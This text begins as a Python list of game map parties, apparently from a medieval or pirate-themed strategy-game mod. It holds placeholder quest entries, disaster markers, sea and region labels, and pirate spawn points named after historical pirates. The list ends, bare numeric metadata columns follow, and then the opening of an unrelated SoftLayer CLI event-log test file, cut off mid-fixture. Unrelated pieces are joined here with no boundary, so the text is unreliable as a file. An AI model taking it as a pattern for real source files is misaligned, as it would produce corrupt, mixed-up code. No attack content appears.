("rand_quest_farmhouse_24", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_25", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_26", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_27", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_28", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_29", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_30", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_04", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_05", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_06", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_07", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_08", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_09", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_10", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_11", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_12", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_13", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_14", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_15", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_16", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_17", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_18", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_19", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_20", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_caravan_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("for_quest_villa", " ", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("workshop_party", " ", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("brothel_party", " ", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("nakepit_party", " ", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ply_hideout", " ", icon_house_exn|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_riot", " ", icon_disaster_riot|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_fire", " ", icon_disaster_fire|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_typhoon", " ", icon_disaster_typhoon|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_flood", " ", icon_disaster_flood|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_epidemic", " ", icon_disaster_blackdeath|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_earthquake", " ", icon_disaster_earthquake|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_tides", " ", icon_disaster_tides|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_ice_town", " ", icon_disaster_ice|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_volcano", " ", icon_disaster_volcano|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_malaria", " ", icon_disaster_malaria|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_sand_town", " ", icon_disaster_sand|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_sand_ply", " ", icon_disaster_sand|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_storm_ply", " ", icon_disaster_storm|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_ice_ply", " ", icon_disaster_ice|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_sand_ai_1", " ", icon_disaster_sand|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_storm_ai_1", " ", icon_disaster_storm|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_ice_ai_1", " ", icon_disaster_ice|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_sand_ai_2", " ", icon_disaster_sand|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_storm_ai_2", " ", icon_disaster_storm|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_ice_ai_2", " ", icon_disaster_ice|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_sand_ai_3", " ", icon_disaster_sand|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_storm_ai_3", " ", icon_disaster_storm|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("disaster_ice_ai_3", " ", icon_disaster_ice|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("markpoint_sea_mid1", " ", icon_text_sea_01|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (177.0, -165.0), [], 5.0),
("markpoint_sea_mid2", " ", icon_text_sea_01|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-26.0, -105.0), [], 355.0),
("markpoint_sea_oriental", " ", icon_text_sea_02|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1210.0, -146.0), [], 20.0),
("markpoint_sea_baltic", " ", icon_text_sea_03|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (24.0, -420.0), [], 40.0),
("markpoint_sea_north", " ", icon_text_sea_04|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (185.0, -408.0), [], 25.0),
("markpoint_sea_black", " ", icon_text_sea_05|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-141.0, -225.0), []),
("markpoint_sea_schina", " ", icon_text_sea_06|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1022.0, 95.0), []),
("markpoint_sea_caspi", " ", icon_text_sea_07|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-323.0, -207.0), []),
("markpoint_sea_adri", " ", icon_text_sea_08|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (54.0, -214.0), [], 330.0),
("markpoint_sea_red", " ", icon_text_sea_09|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-194.0, 49.0), [], 315.0),
("markpoint_sea_cari", " ", icon_text_sea_10|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (997.0, 95.0), []),
("markpoint_sea_aeg", " ", icon_text_sea_11|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-49.0, -151.0), [], 335.0),
("markpoint_sea_echina", " ", icon_text_sea_12|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1144.0, -63.0), [], 10.0),
("markpoint_sea_arab", " ", icon_text_sea_13|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-445.0, 89.0), []),
("markpoint_sea_pers", " ", icon_text_sea_14|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-335.0, -27.0), [], 330.0),
("markpoint_sea_anda", " ", icon_text_sea_15|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-815.0, 137.0), []),
("markpoint_sea_ioni", " ", icon_text_sea_16|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (26.0, -153.0), []),
("markpoint_sea_bengal", " ", icon_text_sea_17|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-720.0, 94.0), []),
("markpoint_sea_lacca", " ", icon_text_sea_18|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-598.0, 176.0), [], 340.0),
("markpoint_sea_bohai", " ", icon_text_sea_19|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1081.0, -165.0), [], 15.0),
("markpoint_sea_yellow", " ", icon_text_sea_20|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1118.0, -125.0), [], 20.0),
("markpoint_sea_oho", " ", icon_text_sea_21|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1383.0, -389.0), []),
("markpoint_sea_java", " ", icon_text_sea_22|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-992.0, 291.0), [], 350.0),
("markpoint_sea_siam", " ", icon_text_sea_23|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-885.0, 149.0), [], 320.0),
("markpoint_sea_aral", " ", icon_text_sea_24|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-426.0, -246.0), []),
("markpoint_sea_albo", " ", icon_text_sea_25|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (262.0, -131.0), []),
("markpoint_sea_levan", " ", icon_text_sea_26|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-144.0, -103.0), [], 70.0),
("markpoint_sea_biscay", " ", icon_text_sea_27|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (283.0, -255.0), [], 25.0),
("markpoint_sea_norway", " ", icon_text_sea_28|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (262.0, -566.0), []),
("markpoint_sea_engc", " ", icon_text_sea_29|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (244.0, -322.0), [], 10.0),
("markpoint_sea_maxi", " ", icon_text_sea_30|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1213.0, -10.0), []),
("markpoint_sea_sagas", " ", icon_text_sea_31|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1040.0, -70.0), [], 5.0),
("markpoint_sea_tyr", " ", icon_text_sea_32|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (98.0, -179.0), [], 335.0),
("markpoint_sea_hud", " ", icon_text_sea_33|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1165.0, -482.0), []),
("markpoint_sea_carpen", " ", icon_text_sea_34|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1289.0, 376.0), []),
("markpoint_geo_gobi", " ", icon_text_geo_01|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-923.0, -212.0), []),
("markpoint_geo_xinjiang", " ", icon_text_geo_02|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-704.0, -184.0), []),
("markpoint_geo_balqash", " ", icon_text_geo_03|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-586.0, -268.0), [], 35.0),
("markpoint_geo_sahara", " ", icon_text_geo_04|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (132.0, -28.0), []),
("markpoint_geo_gibr", " ", icon_text_geo_05|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (288.0, -134.0), []),
("markpoint_geo_alps", " ", icon_text_geo_06|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (137.0, -260.0), [], 25.0),
("markpoint_geo_green", " ", icon_text_geo_07|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (735.0, -589.0), []),
("markpoint_geo_ice", " ", icon_text_geo_08|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (425.0, -592.0), []),
("markpoint_geo_aus", " ", icon_text_geo_09|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1214.0, 489.0), []),
("markpoint_geo_papu", " ", icon_text_geo_10|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1301.0, 287.0), []),
("markpoint_geo_himal", " ", icon_text_geo_11|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-716.0, -43.0), [], 355.0),
("markpoint_geo_pyre", " ", icon_text_geo_12|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (222.0, -215.0), [], 350.0),
("markpoint_geo_cauc", " ", icon_text_geo_13|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-259.0, -217.0), []),
("markpoint_geo_arades", " ", icon_text_geo_14|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-294.0, 32.0), []),
("markpoint_geo_vic", " ", icon_text_geo_15|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-128.0, 252.0), []),
("markpoint_geo_mada", " ", icon_text_geo_16|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-278.0, 433.0), []),
("markpoint_geo_amaz", " ", icon_text_geo_17|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (888.0, 275.0), []),
("markpoint_geo_baikal", " ", icon_text_geo_18|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-943.0, -365.0), [], 40.0),
("pirate_spawn_point_01", "Calico Jack John Rackham", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-413.0, 100.0), []),
("pirate_spawn_point_02", "Conajee Angria", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-534.0, 95.0), []),
("pirate_spawn_point_03", "Black Sam Samuel Bellamy", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (884.0, 79.0), []),
("pirate_spawn_point_04", "Aziza Nurenahal", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-688.0, 105.0), []),
("pirate_spawn_point_05", "Koxinga", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1133.0, 6.0), []),
("pirate_spawn_point_06", "Shu Nian", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1116.0, -108.0), []),
("pirate_spawn_point_07", "Ching Shih", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1025.0, 61.0), []),
("pirate_spawn_point_08", "Murakami Yositada", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1172.0, -105.0), []),
("pirate_spawn_point_09", "Murakami Takeyosi", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1204.0, -137.0), []),
("pirate_spawn_point_10", "Alvilda", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (26.0, -421.0), []),
("pirate_spawn_point_11", "Rollo", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (207.0, -446.0), []),
("pirate_spawn_point_12", "Ragnar Lodbrok", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (201.0, -396.0), []),
("pirate_spawn_point_13", "Francis Drake", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (314.0, -282.0), []),
("pirate_spawn_point_14", "Joao Ferrero", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (527.0, -158.0), []),
("pirate_spawn_point_15", "Catalina Errantzo", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (338.0, -120.0), []),
("pirate_spawn_point_16", "Murat", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-99.0, -108.0), []),
("pirate_spawn_point_17", "Uluj Ali", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (6.0, -119.0), []),
("pirate_spawn_point_18", "Aruj Reis", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (86.0, -118.0), []),
("pirate_spawn_point_19", "Hayreddin Reis", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (196.0, -159.0), []),
("pirate_spawn_point_20", "Edward England", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-260.0, 352.0), []),
("pirate_spawn_point_21", "Samuel Burgess", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (42.0, 619.0), []),
("pirate_spawn_point_22", "Thomas White", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (192.0, 221.0), []),
("pirate_spawn_point_23", "Edward Ned Low", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1057.0, -72.0), []),
("pirate_spawn_point_24", "John Hawkins", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (438.0, -34.0), []),
("pirate_spawn_point_25", "Jean Fleurie", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (840.0, 152.0), []),
("pirate_spawn_point_26", "Howell Davis", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (475.0, 69.0), []),
("pirate_spawn_point_27", "Edward Teach Blackbeard", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1001.0, 90.0), []),
("pirate_spawn_point_28", "William Kidd", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (989.0, 18.0), []),
("pirate_spawn_point_29", "Bartholomew Roberts", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1082.0, 75.0), []),
("spawn_points_end", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("reserved_1", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("reserved_2", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("reserved_3", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("reserved_4", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("reserved_5", "{!}last spawn point", icon_player|pf_disabled|pf_is_static, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
]
| 77.78224
| 195
| 0.718672
| 42,089
| 247,892
| 3.825893
| 0.054147
| 0.058834
| 0.078396
| 0.117594
| 0.800302
| 0.796526
| 0.79521
| 0.792769
| 0.792552
| 0.792552
| 0
| 0.096029
| 0.1001
| 247,892
| 3,187
| 196
| 77.78224
| 0.625817
| 0.00359
| 0
| 0.00126
| 0
| 0
| 0.104846
| 0.008113
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003781
| 0
| 0.003781
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a7ff0dcb1a8bee97960346443f3125425b77f3ad
| 14,496
|
py
|
Python
|
tests/CLI/modules/event_log_tests.py
|
erick-sapp/softlayer-python
|
c0553f41ffcb27d899065a6ebe225392e690aed5
|
[
"MIT"
] | null | null | null |
tests/CLI/modules/event_log_tests.py
|
erick-sapp/softlayer-python
|
c0553f41ffcb27d899065a6ebe225392e690aed5
|
[
"MIT"
] | 2
|
2019-02-18T18:35:51.000Z
|
2019-06-30T15:36:44.000Z
|
tests/CLI/modules/event_log_tests.py
|
erick-sapp/softlayer-python
|
c0553f41ffcb27d899065a6ebe225392e690aed5
|
[
"MIT"
] | null | null | null |
"""
SoftLayer.tests.CLI.modules.event_log_tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:license: MIT, see LICENSE for more details.
"""
import json
from SoftLayer.CLI import formatting
from SoftLayer import testing
class EventLogTests(testing.TestCase):
    """Tests for the ``slcli event-log`` CLI commands.

    The JSON-output test and the table-output test expect the same seven
    fixture events, so the expected values are built once from ``_RAW_LOGS``
    by :meth:`_expected_logs` instead of being duplicated inline.
    """

    # Fixture events as (date, event, object, username, type, raw_metadata).
    # ``raw_metadata`` is the compact JSON string as returned by the API, or
    # ``None`` when the event carries no metadata (rendered as '').
    _RAW_LOGS = (
        ('2017-10-23T14:22:36.221541-05:00',
         'Disable Port',
         'test.softlayer.com',
         'SYSTEM',
         'CCI',
         None),
